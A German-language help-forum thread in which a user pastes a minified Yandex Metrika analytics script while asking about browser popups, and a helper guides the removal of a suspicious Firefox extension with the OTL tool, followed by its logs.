function B(a){return Math.floor(Math.random()*("number"==typeof a?a:1E6))}function O(a){for(var b=+new Date,c=1;0<c;c++)if(0==c%1E3){var e=+new Date;if(b>e)break;if(e-b>a)break}}function Z(a,b){if(!a||!b)return!1;for(var c=[],e=0;e<b.length;e++)c.push(b[e].replace(/\^/g,"\\^").replace(/\$/g,"\\$").replace(/\./g,"\\.").replace(/\[/g,"\\[").replace(/\]/g,"\\]").replace(/\|/g,"\\|").replace(/\(/g,"\\(").replace(/\)/g,"\\)").replace(/\?/g,"\\?").replace(/\*/g,"\\*").replace(/\+/g,"\\+").replace(/\{/g,
"\\{").replace(/\}/g,"\\}"));return RegExp("\\.("+c.join("|")+")$","i").test(a)}function V(a,k){var c=k.target,e=!1;if(!k.hostname)return!1;if(!c||"_self"==c||"_top"==c||"_parent"==c)e=!0;(c=a.shiftKey||a.ctrlKey||a.altKey)||a.modifiers&&b.Event&&(c=a.modifiers&b.Event.CONTROL_MASK||a.modifiers&b.Event.SHIFT_MASK||a.modifiers&b.Event.ALT_MASK);return e&&!c}function U(a,b,c,e,g){function j(a,b){G[G.length]=a;G[G.length]=b}g=g||{};c="undefined"!=typeof c?c:qa;var G=[];g.ar&&!g.onlyData&&(c=J(c),a=J(a));
j("page-ref",y(c,sa));j("page-url",y(a,sa));j("browser-info",C(b,g));Sa()?j("ut",ya):"undefined"!=typeof g.ut&&j("ut",y(""+g.ut,gb));e&&j("site-info",y(v(e),hb));g.saveRef&&(qa=c);a=W(ua,G);Ca()||((new Image).src=a,fa(a),g.isDelay&&O(g.delay));return a}function W(a,b){for(var c=["rn",B(),"cnt-class",q].concat(b),e=[],g=0;g<c.length;g+=2){var j=c[g+1];j&&(e[e.length]=c[g]+"="+j)}return Ha+a+w+"?"+e.join("&")}function J(a){var b=z(),c=b.host,b=b.href;if(!a)return b;if(-1!=a.search(/^\w+:\/\//))return a;
var e=a.charAt(0);if("?"==e)return e=b.search(/\?/),-1==e?b+a:b.substr(0,e)+a;if("#"==e)return e=b.search(/#/),-1==e?b+a:b.substr(0,e)+a;if("/"==e){if(e=b.search(c),-1!=e)return b.substr(0,e+c.length)+a}else return c=b.split("/"),c[c.length-1]=a,c.join("/");return a}function fa(a){"function"==typeof b.ymLog&&b.ymLog(a)}function C(d,k){function c(a,b){a&&b&&(e[e.length]=[a,b].join(":"))}k=k||{};var e=[],g=-1*(new Date).getTimezoneOffset(),j;j=new Date;j=[j.getFullYear(),j.getMonth()+1,j.getDate(),
j.getHours(),j.getMinutes(),j.getSeconds()];for(var G="",q=0;q<j.length;q++)G+=10>j[q]?"0"+j[q]:j[q];j=G;cb||(cb=j,yb=g);c("j",ca.javaEnabled()?"1":"");la&&c("s",la.width+"x"+la.height+"x"+(la.colorDepth||la.pixelDepth));if(null===Ia){var q=G=null,h,n=b.navigator;if("undefined"!=typeof n.plugins&&"object"==typeof n.plugins["Shockwave Flash"])(G=n.plugins["Shockwave Flash"].description)&&!("undefined"!=typeof n.mimeTypes&&n.mimeTypes["application/x-shockwave-flash"]&&!n.mimeTypes["application/x-shockwave-flash"].enabledPlugin)&&
(q=G.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,"."));else if("undefined"!=typeof b.ActiveXObject)try{if(h=new ActiveXObject("ShockwaveFlash.ShockwaveFlash"))(G=h.GetVariable("$version"))&&(q=G.split(" ")[1].replace(/,/g,".").replace(/[^.\d]/g,""))}catch(w){}Ia=q}c("f",Ia);h=-1;a.documentElement&&"CSS1Compat"==a.compatMode?h=a.documentElement.clientWidth:a.body&&(h=a.body.clientWidth);G=-1;a.documentElement&&"CSS1Compat"==a.compatMode?G=a.documentElement.clientHeight:a.body&&(G=a.body.clientHeight);
c("w",h+"x"+G);c("z",g);c("i",j);if(null===Ja){g=null;if(b.ActiveXObject)try{var f=new ActiveXObject("AgControl.AgControl");h=function(a,b,d,c){for(;a.isVersionSupported(b[0]+"."+b[1]+"."+b[2]+"."+b[3]);)b[d]+=c;b[d]-=c};j=[1,0,0,0];h(f,j,0,1);h(f,j,1,1);h(f,j,2,1E4);h(f,j,2,1E3);h(f,j,2,100);h(f,j,2,10);h(f,j,2,1);h(f,j,3,1);g=j.join(".")}catch(pa){}else if(f=ca.plugins["Silverlight Plug-In"])g=f.description;Ja=g}c("l",Ja||"");c("en",(""+(a.characterSet||a.charset||"")).toLowerCase());c("v",Bb);
c("c",ca.cookieEnabled?"1":"");ra&&a.documentMode&&(null===va&&(va=Function("return /*@cc_on @_jscript_version @*/;")()),va&&c("jv",va));c("la",(ca&&(ca.language||ca.browserLanguage)||"").toLowerCase());c("ex","prerender"==a.webkitVisibilityState?"pre1":"");X&&c("wh","1");g="ar ln dl ad nb pa".split(" ");for(f=0;f<g.length;f++)h=g[f],c(h,k[h]?"1":"");g=["va","vt","sn","sa","he"];k.nb&&g.push("cl");for(f=0;f<g.length;f++)h=g[f],c(h,k[h]);c("hid",na);if(!k.ar){a:{if(f=(f=b.performance||b.webkitPerformance)&&
f.timing)if(g=f.navigationStart){h=[f.domainLookupEnd-f.domainLookupStart,f.connectEnd-f.connectStart,f.responseStart-f.requestStart,f.responseEnd-f.responseStart,f.fetchStart-g];f.loadEventStart&&h.push(f.loadEventStart-g);f=h.join(",");break a}f=""}c("ds",f)}if(t._webvisor){b.name||(b.name=Math.round(65535*Math.random()));if(f=+b.name)0>f&&(f*=-1),f%=65535;c("wn",f||Da(b.name));try{b.history&&c("hl",String(b.history.length))}catch(l){}}f="undefined"==typeof d?(f=r())?y(f,ib):"":y(d,ib);c("t",f);
return e.join(":")}function r(){var b=a.title;"string"!=typeof b&&(b=(b=a.getElementsByTagName("title"))&&b.length?b[0].innerHTML:"");return b}function da(b){var k=!1;if(b&&"string"!=typeof b&&b.length)for(var c=0;c<b.length;c++){var e=b[c].selector,g=b[c].text,j=e.charAt(0),e=e.slice(1);if("#"==j){if(j=a.getElementById(e))k=!0,j.innerHTML=g}else if("."==j){j=e;e=(e=void 0)||a;if(e.getElementsByClassName)j=e.getElementsByClassName(j);else{for(var e=e.getElementsByTagName("*"),h=[],q=0;q<e.length;q++)lb(e[q],
j)&&h.push(e[q]);j=h}for(e=0;e<j.length;e++)k=!0,j[e].innerHTML=g}}return k}function oa(a){var b={delay:za};switch(typeof a){case "string":b.on=!0;break;case "object":b.on=!0;b.delay="number"!=typeof a.delay?za:a.delay;break;case "boolean":b.on=a;break;default:return}M=b}function ia(){Fa=qa=Ea;U(z().href,r(),Fa,null,{ut:Ga,ad:1==q&&b.Ya&&b.Ya.Direct?!0:!1,wh:!0,saveRef:!0});Ea=z().href}function Ba(d){function k(){var b=a.documentElement;return Math.max(b.scrollWidth,a.body.scrollWidth,b.clientWidth)}
function c(a){return a.toString().toUpperCase()}function e(a){return a&&(a=""+a.className)&&-1!=a.search(/ym-clickmap-ignore/)?!0:!1}function g(b){if(null==b.pageX&&null!=b.clientX){var d=a.documentElement,c=a.body;b.pageX=b.clientX+(d&&d.scrollLeft||c&&c.scrollLeft||0)-(d.clientLeft||0);b.pageY=b.clientY+(d&&d.scrollTop||c&&c.scrollTop||0)-(d.clientTop||0)}return{x:b.pageX,y:b.pageY}}function j(a){for(var b=c(a.nodeName);a.parentNode&&"BODY"!=b&&"HTML"!=b;){if("A"==b||"INPUT"==b||"TEXTAREA"==b)return!0;
a=a.parentNode;b=a.nodeName}return!1}for(var h=this,q=0,r=null,n="A B BIG BODY BUTTON DD DIV DL DT EM FIELDSET FORM H1 H2 H3 H4 H5 H6 HR I IMG INPUT LI OL P PRE SELECT SMALL SPAN STRONG SUB SUP TABLE TBODY TD TEXTAREA TFOOT TH THEAD TR U UL ABBR AREA BLOCKQUOTE CAPTION CENTER CITE CODE CANVAS DFN EMBED FONT INS KBD LEGEND LABEL MAP OBJECT Q S SAMP STRIKE TT ARTICLE AUDIO ASIDE FOOTER HEADER MENU METER NAV PROGRESS SECTION TIME VIDEO NOINDEX NOBR".split(" "),t=59,f=String.fromCharCode,pa={},l=0;l<
n.length;l++)pa[n[l]]=f(t),f(t),t++;this.handler=function(d){var f=a.getElementsByTagName("body")[0];if(!b.ymDisabledClickmap&&!e(f)){if(h._prefs.hasQuota){if(!h._prefs.quota)return;h._prefs.quota--}var l=d.target||d.srcElement;3==l.nodeType&&(l=l.parentNode);var f=c(l.nodeName),u=g(d),x;!d.which&&d.button!==ma&&(d.which=d.button&1?1:d.button&2?3:d.button&4?2:0);x=d.which;if(x=!((2==x||3==x)&&"A"!=f))if(x=l.offsetHeight,x=!(0===l.offsetWidth&&0===x||l.style&&"none"===l.style.display)){b:{for(x=l;x.parentNode;){if(e(x)){x=
!0;break b}x=x.parentNode}x=!1}if(x=!x){b:{x=h._prefs.ignoreTags;for(var n=0;n<x.length;n++)if(c(x[n])==c(f)){x=!0;break b}x=!1}x=!x&&h._prefs.filter(l,f)}}if(x){f=+new Date;l={dom:l,x:u.x,y:u.y,time:f};if(u=50<f-q)if(!(u=!h._prefs.ignoreSameClicks)){if(u=r){x=Math.abs(u.x-l.x);var n=Math.abs(u.y-l.y),t=l.time-u.time,u=u.dom==l.dom&&2>x&&2>n&&1E3>t?!0:!1}else u=!1;u=!u}if(u&&!Ca()){x=g(d);u=x.x;x=x.y;var n=d.target||d.srcElement,w=h._prefs,v;if(n.getBoundingClientRect){t=n.getBoundingClientRect();
v=a.body;var E=a.documentElement,A=t.left+(b.pageXOffset||E.scrollLeft||v.scrollLeft)-(E.clientLeft||v.clientLeft||0),t={top:Math.round(t.top+(b.pageYOffset||E.scrollTop||v.scrollTop)-(E.clientTop||v.clientTop||0)),left:Math.round(A)}}else{t=n;for(E=v=0;t;)v+=parseInt(t.offsetTop),E+=parseInt(t.offsetLeft),t=t.offsetParent;t={top:v,left:E}}v=t;E="";t=z().href;switch(w.mode){case "fixed":E="0";j(n)&&(E+="u");break;case "centered":E="1";w=Math.floor(k()/2);u=u>w?u-w+32768:u;j(n)&&(E+="u");break;default:w=
c(n.nodeName);w="BODY"==w||"HTML"==w?k():n.offsetWidth;E=c(n.nodeName);"BODY"==E||"HTML"==E?(E=a.documentElement,E=Math.max(E.scrollHeight,a.body.scrollHeight,E.clientHeight)):E=n.offsetHeight;w||(w=1);E||(E=1);u=Math.floor(65535*(u-v.left)/w);x=Math.floor(65535*(x-v.top)/E);for(w="";n.parentNode&&"BODY"!=c(n.nodeName)&&"HTML"!=c(n.nodeName);){w+=pa[n.nodeName]||"*";b:{v=n.parentNode;for(A=E=0;A<v.childNodes.length;A++)if(n.nodeName==v.childNodes[A].nodeName){if(n==v.childNodes[A]){v=E;break b}E++}v=
0}w+=v||"";n=n.parentNode}E=y(w,128)}X||(t=t?t.replace(/\#.*$/,""):t);"function"==typeof h._prefs.urlFilter&&(t=h._prefs.urlFilter(t));u=W(Ta,["page-url",y(t,sa),"pointer-click","x:"+u+":y:"+x+":t:"+Math.floor(Math.floor(+new Date-Cb)/100)+":p:"+E]);(new Image).src=u;fa(u);if(u=d.target||d.srcElement){3==u.nodeType&&(u=u.parentNode);for(x=c(u.nodeName);u.parentNode&&u.parentNode.nodeName&&("A"!=x&&"AREA"!=x||!u.href);)u=u.parentNode,x=c(u.nodeName);u=!u.href?!1:u}else u=!1;u&&V(d,u)&&O(h._prefs.delay)}q=
f;r=l}}};this.setPrefs=function(a){function b(){return!0}this._prefs="undefined"==typeof a||!1===a||!0===a?{filter:b,ignoreTags:[],mode:"",delay:za,quota:0,hasQuota:!1,ignoreSameClicks:!0}:{filter:a.filter||b,ignoreTags:a.ignoreTags||[],mode:a.mode||"",delay:"undefined"==typeof a.delay?za:a.delay,quota:a.quota||0,hasQuota:!!a.quota,ignoreSameClicks:"undefined"==typeof a.ignoreSameClicks?!0:!1,urlFilter:a.urlFilter}};this.updateStatus=function(a){switch(typeof a){case "undefined":this.start(!0);break;
case "boolean":a?this.start(a):this.stop();break;case "object":this.start(a)}};this._start=!1;this.start=function(b){this.setPrefs(b);this._start||A(a,"click",this.handler);this._start=!0};this.stop=function(){this._start&&I(a,"click",this.handler);this._start=!1};this.start(d)}var t=this,na=Math.round(1073741824*Math.random()),ua="//mc.yandex.ru/watch/",Ta="//mc.yandex.ru/clmap/",P,Ga="",Ha=xa,qa=T.href,Ea=T.href,Fa="",L;Ya._metrika.counter||(Ya._metrika.counter=t);"object"==typeof w&&(L=w,h=w.defer,
Ga=w.ut,q=w.type,n=w.params,Ha=w.onlyHttps?"https:":xa,w=w.id);w=w||0;q=q||0;P=w+":"+q;if(Ya._metrika.counters[P])return Ya._metrika.counters[P];var ga=[],Ia=null,Ja=null,va=null,Ka=new function(d,k,c){function e(a,d,c){if(h)g(h,j(a,d,0),c,"application/x-www-form-urlencoded");else{if("XMLHttpRequest"in b){var e=new XMLHttpRequest;if("withCredentials"in e){var k=c?"POST":"GET";a=j(a,d,"POST"==k?1:0);e.open(k,a,!0);e.withCredentials=!0;"POST"==k&&!Sb&&e.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
e.send("POST"==k?kb(c):null);return}}for(k in c)c.hasOwnProperty(k)&&(d[k]=c[k]);(new Image).src=j(a,d,0)}}function g(a,b,d,c){var e="ifr"+Math.round(1E10*Math.random()),g=a.createElement("div");g.style.position="absolute";g.style.left="-99999px";g.style.top="-99999px";b=['<iframe name="',e,'"></iframe>','<form action="',b,'" method="post" target="',e,'" enctype="',c,'">'];for(var k in d)d.hasOwnProperty(k)&&N(b,'<textarea name="',k,'"></textarea>');N(b,"</form>");g.innerHTML=b.join("");a.body.appendChild(g);
k=g.getElementsByTagName("form")[0];for(var j in d)d.hasOwnProperty(j)&&(k[j].value=d[j]);k.submit();setTimeout(function(){a.body.removeChild(g)},1E4)}function j(a,b,e){b["browser-info"]=["ct",e,b["browser-info"]].join(":");return d+"//"+k+"/"+a+"/"+c+"?"+kb(b)}try{var h;if(b.ActiveXObject){var n=new ActiveXObject("htmlfile");n.open();n.write("<html><body></body></html>");n.close();h=n}else h=null}catch(q){}var t="",r=[];return{send:function(a,b,d,c){a?t?-1<t.indexOf("|"+a+"|")&&e(b,d,c):N(r,arguments):
e(b,d,c)},sendMultipart:function(b,d,c,e){g(h||a,j(b,d,e),c,"multipart/form-data")},init:function(a){t="|"+a.join("|")+"|";for(a=0;a<r.length;a++)-1<t.indexOf("|"+r[a][0]+"|")&&e(r[a][1],r[a][2],r[a][3]);r.length=0}}}(Ha,"mc.yandex.ru",w),H;t.replacePhones=function(){try{var a=ta("_ym_mp2_substs_"+w);if(a){var b=(new Function("return "+a))();b&&da(b)}}catch(c){}};t.reachGoal=function(b,k){var c=b?"goal://"+z().hostname+"/"+b:z().href,e=r(),g=b?z().href:a.referrer;U(c,e,g,k,{ar:!0,isDelay:b?!0:!1,
delay:100});return!0};var M;t.trackLinks=oa;t.hit=function(a,b,c,e,g){a&&U(a,b,c,e,{ut:g,ar:!0,saveRef:!0})};t.params=function(a){if(a){var b=arguments.length;if(1<b){for(var c={},e=c,g=0;g<b-1;g++){var j=""+arguments[g];e[j]={};g<b-2&&(e=e[j])}e[j]=arguments[b-1];a=c}U("","","",a,{ar:!0,pa:!0,onlyData:!0})}};t.file=function(a,b,c,e){a&&U(a,"",z().href,e,{ar:!0,ln:!0,dl:!0})};t.extLink=function(a,b,c,e){a&&U(a,"",z().href,e,{ar:!0,ln:!0,ut:ya})};t.notBounce=function(){var a=0;Ra&&Aa&&(a=Aa-Ra);U("",
"","",null,{cl:a,ar:!0,nb:!0,onlyData:!0})};var Q=[];t.addFileExtension=function(a){"string"==typeof a?Q.push(a):Q=Q.concat(a)};t.clickmap=function(a){t._clickmap?t._clickmap.updateStatus(a):t._clickmap=new Ba(a)};var La=!1;t.accurateTrackBounce=function(d){function k(){t.notBounce()}if(!La){La=!0;var c=a.referrer,e=z().href,g=function(a){a=a.split(":");a=a[1]||"";a=a.replace(/^\/*/,"").replace(/^www\./,"");return a.split("/")[0]};if(!(!c||!e?!c&&!e:g(c)==g(e)))if("number"!=typeof d&&(d=15E3),ra)setTimeout(k,
d);else{var j=d,h=function(){if(!m){l&&clearTimeout(l);var a=j-(w?f:f+ +new Date-v);0>a&&(a=0);l=setTimeout(function(){m=!0;n(!1);k()},a)}};d=function(){r||(q=!0,w=!1,r=!0,h())};var n=function(a){for(var b=0;b<s.length;b+=3)a?A(s[b],s[b+1],s[b+2]):I(s[b],s[b+1],s[b+2])},q=!1,r=!1,w=!0,f=0,v=+new Date,l=null,m=!1,s=[b,"blur",function(){w=q=r=!0;f+=+new Date-v;v=+new Date;h()},b,"focus",function(){!q&&!r&&(f=0);v=+new Date;q=r=!0;w=!1;h()},a,"click",d,a,"mousemove",d,a,"keydown",d,a,"scroll",d];n(!0);
h()}}};var Ma=null,X=!1;t.trackHash=function(a){if(!1===a)X&&("onhashchange"in b?I(b,"hashchange",ia):clearInterval(Ma),X=!1);else if(!X){if("onhashchange"in b)A(b,"hashchange",ia);else{var k=function(){var a=z().hash.split("#")[1];if("undefined"==typeof a)return!1;var b=a.indexOf("?");0<b&&(a=a.substring(0,b));return a},c=k();(function g(){var a=k();a!==c&&(ia(),c=a);Ma=setTimeout(g,200)})()}X=!0}t._trackHash=X};t.video=function(a,b,c,e){var g=["end","play","pause","seek"];if(a&&c){a:{for(var j=
0,h=g.length;j<h;j+=1)if(a===g[j]){g=j;break a}g=-1}-1!==g&&U(c,e||"","",null,{ar:!0,va:a,vt:~~b})}};t.social=function(a,b,c){a&&b&&U(c||z().href,"","",null,{ar:!0,sn:y(a,64),sa:y(b,64)})};t.enableAll=function(){t.trackLinks(!0);t.clickmap(!0);t.accurateTrackBounce()};t.pause=O;t.uploadPage=function(){};if(w)a:{var R=!1;if(Ya._metrika.hitParam[P])if(1==q&&!Ya._metrika.counters[P])R=!0;else break a;Ya._metrika.counters[P]=t;Ya._metrika.hitParam[P]=1;t._webvisor=!h&&(L&&L.webvisor||!1);L&&L.trackHash&&
t.trackHash(!0);if(!h&&!R){t.replacePhones();var S=ta("_ym_visorc");"b"!=S&&"w"!=S&&(S="");aa("_metrika_enabled","1",60);h=!!ta("_metrika_enabled");aa("_metrika_enabled","",-1);h||(S="b");Ra=+new Date;h=T.href;P=r();var Y=a.referrer,R={ut:Ga,he:L?~~L.httpError:0,ad:1==q&&b.Ya&&b.Ya.Direct?!0:!1,saveRef:!0},Na=S,$=function(a,b){ka[ka.length]=a;ka[ka.length]=b},R=R||{},Y="undefined"!=typeof Y?Y:qa,ka=[];R.ar&&!R.onlyData&&(Y=J(Y),h=J(h));if(!Ca()){var ja="_ymjsp"+("--"==w?"":B()),ba=a.createElement("script");
b[ja]=function(d){try{delete b[ja]}catch(k){b[ja]=ma}Aa||(Aa=+new Date);d=d||{};var c=d.webvisor||{},e=[];if(H){var g=+c.recp;if(!isFinite(g)||0>g||1<g)S="w";S||(S=na%1E4/1E4<g?"w":"b");aa("_ym_visorc",S,30);"w"==S?(N(e,"visor"),g=c.arch_type,(c=c.urls)&&g&&H.uploadPages(c,g)):H.stop()}Ka.init(e);c=d.mp2;e=w;d=t;aa("_ym_mp2_substs_"+e,"",-1);if(c){g="_ym_mp2_track_"+e;a:{var j=c.conditions;if(j&&j.length)for(var h=0;h<j.length;h++){var n;if("ref"==j[h].type)b:{n=j[h];for(var r=a.referrer||"",q=n.patterns,
y=0;y<q.length;y++)if(r.match(RegExp(q[y]))){var f=n.params||[];if(f.length)for(var z=decodeURIComponent((RegExp.$1||"").replace(/\+/g,"%20")),l=0;l<f.length;l++){if(z==decodeURIComponent(f[l])){n=!0;break b}}else{n=!0;break b}}n=!1}else if(n="adv"==j[h].type){r=j[h];z=r.ServiceNamePattern;q=r.RefererPattern;n=r.direct_camp;y=a.referrer;l=(l=T.search)&&l.replace(/^\?/,"");f={};if(l)for(var l=l.split("&"),m=0;m<l.length;m++){var s=l[m].split("=");f[decodeURIComponent(s[0])]=decodeURIComponent(s[1])}l=
void 0;b:{s=T.search;m=T.hash;s=s&&s.replace(/^\?/,"");m=m&&m.replace(/^#/,"");l="";if(s)for(var s=s.split("&"),D=0;D<s.length;D++){var u=s[D].split("=");"_openstat"==u[0]&&(l=u[1])}m&&0==m.indexOf("_openstat=")&&(l=m.slice(10));if(l){m=void 0;if(-1<l.indexOf(";"))m=decodeURIComponent(l);else c:{for(;l.length%4;)l+="=";var x=void 0,B=void 0,C=void 0,C=s=m=B=x=void 0,D=0,u="";do{x="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".indexOf(l.charAt(D++));B="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".indexOf(l.charAt(D++));
m="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".indexOf(l.charAt(D++));s="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".indexOf(l.charAt(D++));if(0>x||0>B||0>m||0>s){m=null;break c}C=x<<18|B<<12|m<<6|s;x=C>>16&255;B=C>>8&255;C&=255;u=64==m?u+String.fromCharCode(x):64==s?u+String.fromCharCode(x,B):u+String.fromCharCode(x,B,C)}while(D<l.length);l=u;m="";for(D=c1=c2=s=0;s<l.length;)D=l.charCodeAt(s),128>D?(m+=String.fromCharCode(D),s++):191<D&&224>D?(c2=l.charCodeAt(s+
1),m+=String.fromCharCode((D&31)<<6|c2&63),s+=2):(c2=l.charCodeAt(s+1),c3=l.charCodeAt(s+2),m+=String.fromCharCode((D&15)<<12|(c2&63)<<6|c3&63),s+=3)}l=m}if(l&&(l=l.split(";"),4==l.length)){l={service:l[0],campaign:l[1],ad:l[2],source:l[3]};break b}l=null}m={};s=["source","medium","campaign","term","content"];for(D=0;D<s.length;D++)f["utm_"+s[D]]&&(m[s[D]]=f["utm_"+s[D]]);D=l&&l.service||m.source;s=!1;if(!s&&z&&z.length)for(u=0;u<z.length;u++)if(RegExp(z[u]).test(D)){s=!0;break}if(!s&&q&&q.length)for(z=
0;z<q.length;z++)if(RegExp(q[z]).test(y)){s=!0;break}!s&&(r.google_adwords&&f.gclid)&&(s=!0);if(s&&(n&&n.length)&&(s=!1,r=l&&l.campaign||m&&m.campaign))for(q=0;q<n.length;q++)if(n[q]==r){s=!0;break}n=s}if(n){j[h].track_id&&aa(g,j[h].track_id,43200);break a}}}if((g=ta(g))&&c.substs)if(c=c.substs[g])aa("_ym_mp2_substs_"+e,v(c)),e=da(c),d.params("__ym",e?"mp_trackid":"mp_trackid_bad",g)}A(b,"load",t.replacePhones);t._inited=!0;ba.parentNode&&ba.parentNode.removeChild(ba)};$("wmode",5);$("callback",ja);
$("page-ref",y(Y,sa));$("page-url",y(h,sa));h=C(P,R);Na&&(h=["vc",Na,h].join(":"));$("browser-info",h);Sa()?$("ut",ya):"undefined"!=typeof R.ut&&$("ut",y(""+R.ut,gb));n&&$("site-info",y(v(n),hb));R.saveRef&&(qa=Y);h=W(ua,ka);ba.type="text/javascript";ba.src=h;P=a.getElementsByTagName("head")[0];P.insertBefore(ba,P.firstChild);fa(h)}}oa(!1);A(a,"click",function(a){if(M.on){var b=function(a){var b=Db(c.innerHTML?c.innerHTML.toString().replace(/<\/?[^>]+>/gi,""):"");U(j,j==b?"":b,z().href,null,a)},c;
var e=a.target||a.srcElement;if(e){3==e.nodeType&&(e=e.parentNode);for(var g=e.nodeName.toString().toLowerCase();e.parentNode&&e.parentNode.nodeName&&("a"!=g&&"area"!=g||!e.href);)e=e.parentNode,g=e.nodeName.toString().toLowerCase();c=e.href?e:!1}else c=!1;if(c){var e=!1,j=""+c.href,g=j?j.split(/\?/)[0]:"";if(jb.test(g)||jb.test(j)||Z(j,Q)||Z(g,Q))e=!0;var h=c.className,g=h&&-1!=h.search(/ym-disable-tracklink/)?!0:!1,h=h&&-1!=h.search(/ym-external-link/)?!0:!1;g||(a={ln:!0,dl:e,isDelay:V(a,c),delay:M.delay},
h?b(a):(g=z().hostname,h=c.hostname,(g?g.replace(/^www\./,""):"")==(h?h.replace(/^www\./,""):"")?e&&(a.ln=!1,b(a)):j&&-1!=j.search(/^ *javascript:/i)||(a.ut=ya,b(a))))}}});L&&(L.enableAll?t.enableAll():(L.clickmap&&t.clickmap(L.clickmap),L.trackLinks&&t.trackLinks(L.trackLinks),L.accurateTrackBounce&&t.accurateTrackBounce(L.accurateTrackBounce),L.ad&&ad()));t._webvisor&&(H=new mb(w,q,L,na,Ka,t))}};b.ya_cid&&new Ya.Metrika(b.ya_cid,b.ya_params,b.ya_class);b.ya_cid&&!b.ya_hit&&(b.ya_hit=function(a,
b){Ya._metrika.counter&&Ya._metrika.counter.reachGoal(a,b)});var I=b.yandex_metrika_callback,V=b.yandex_metrika_callbacks;"function"==typeof I&&I();if("object"==typeof V)for(I=0;I<V.length;I++){var da=V[I];da&&(V[I]=null,da())}oa("yandex_metrika_callback");oa("yandex_metrika_callbacks");V=["link","click","scroll","res"];for(I=0;I<V.length;I++)if(da=V[I]+"map",-1!=T.href.search("ym_playback="+da)){ia(xa+"//metrika.yandex.ru/js/"+da+"/_loader.js");break}b.Ya.Metrika.informer=function(a){var b=!!Ya.Metrika._informer;
Ya.Metrika._informer=a;b||ia(xa+"//mc.yandex.ru/metrika/informer.js")};if(top!=b&&parent==top&&b.postMessage&&!Ya.Metrika_visorPlayerOn){Ya.Metrika_visorPlayerOn=!0;I=a.createElement("div");I.innerHTML='<iframe name="RemoteIframe" allowtransparency="true" style="position: absolute; left: -999px; top: -999px; width: 1px; height: 1px;"></iframe>';var Ba=I.firstChild;setTimeout(function(){var b=a.body||a.documentElement;b.insertBefore(Ba,b.firstChild);try{var n=Ba.contentWindow.document}catch(q){}n&&
(n.open(),n.write('<!doctype html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7,IE=edge" /></head><body><script type="text/javascript">var newversion = true;try {if (top.postMessage) {window.onmessage = function(evt) {evt = evt || window.event;try {var message = new Function("return " + evt.data)();} catch (e) {return;}if (/(^|\\.)yandex\\.(ru|com|ua|kz|by|com\\.tr)(:\\d{4})?$/.test(evt.origin) && message.name == "script" && message.data) {var head = document.getElementsByTagName("head")[0];var base = document.createElement("base");base.href = message.data;head.appendChild(base);var script = document.createElement("script");script.src = message.data;head.appendChild(script);if (navigator.userAgent.indexOf("Firefox/3.6.") > -1) {parent.removeEventListener("message", window.onmessage, false);}window.onmessage = null;}};if (navigator.userAgent.indexOf("Firefox/3.6.") > -1) {parent.addEventListener("message", window.onmessage, false);}top.postMessage(\'{"name":"ping"}\', "*");}} catch (e) {}\x3c/script></body></html>'),
n.close())},500)}})(this,this.document);
         

Leider verstehe ich von dem Zeug nur sehr wenige. Ich hatte war mal ein bisschen XHTML, PHP und JavaScript, aber wirklich beschäftigt habe ich mich mit dem ganzen Kram noch nie. Vielleicht hilft das ja in irgendeiner Art und Weise weiter.

Hi,

mach bitte Folgendes und teste danach wieder, ob die Popups noch auftreten.


Lade dir bitte OTL (von Oldtimer) herunter und speichere es auf deinen Desktop.

• Starte bitte die OTL.exe.
• Kopiere nun den folgenden Inhalt aus der Codebox in die Textbox.
  Wichtig: Falls du deinen Benutzernamen im Log unkenntlich gemacht hast (z.B. durch ***), dann mach das hier wieder rückgängig.

Code: Alles auswählenAufklappen

ATTFilter

:OTL
[2013.06.03 19:12:34 | 000,374,078 | ---- | M] () (No name found) -- d:\Users\Dani\AppData\Roaming\mozilla\firefox\profiles\7qmo9taz.default\extensions\jid1-QpHD8URtZWJC2A@jetpack.xpi
         

• Schliesse nun bitte alle anderen Programme.
• Klicke jetzt auf den Fix Button.
• OTL kann gegebenfalls einen Neustart verlangen. Diesen bitte zulassen.
• Nach dem Neustart findest du ein Textdokument auf deinem Desktop.
  (Auch zu finden unter C:\_OTL\MovedFiles\<date_time>.log)
• Kopiere nun dessen Inhalt hier in deinen Thread.

Tut mir leid für die verspätete Antwort. War über's Wochenende nicht zuhause.
Die Datei die ich da bearbeiten sollte wurde nicht gefunden.

Code: Alles auswählenAufklappen

ATTFilter

========== OTL ==========
File d:\Users\Dani\AppData\Roaming\mozilla\firefox\profiles\7qmo9taz.default\extensions\jid1-QpHD8URtZWJC2A@jetpack.xpi not found.
 
OTL by OldTimer - Version 3.2.69.0 log created on 06112013_151802
         

Dann muss ich nochmals schnell reinschauen:


Starte bitte die OTL.exe.

• Setze den Haken bei Scan all Users.
• Drücke auf den Quick Scan Button.
• Poste den Inhalt von OTL.txt hier in den Thread.

Hier der neue Log:

Code: Alles auswählenAufklappen

ATTFilter

OTL logfile created on: 11.06.2013 15:27:04 - Run 2
OTL by OldTimer - Version 3.2.69.0     Folder = d:\Users\Dani\Desktop
64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.10.9200.16576)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
 
7,96 Gb Total Physical Memory | 5,32 Gb Available Physical Memory | 66,84% Memory free
15,96 Gb Paging File | 13,30 Gb Available in Paging File | 83,35% Paging File free
Paging file location(s): d:\pagefile.sys 8192 8192 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 111,69 Gb Total Space | 73,82 Gb Free Space | 66,09% Space Free | Partition Type: NTFS
Drive D: | 931,51 Gb Total Space | 801,82 Gb Free Space | 86,08% Space Free | Partition Type: NTFS
Drive E: | 931,51 Gb Total Space | 642,10 Gb Free Space | 68,93% Space Free | Partition Type: NTFS
 
Computer Name: DANI-PC | User Name: Dani | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Quick Scan | Include 64bit Scans
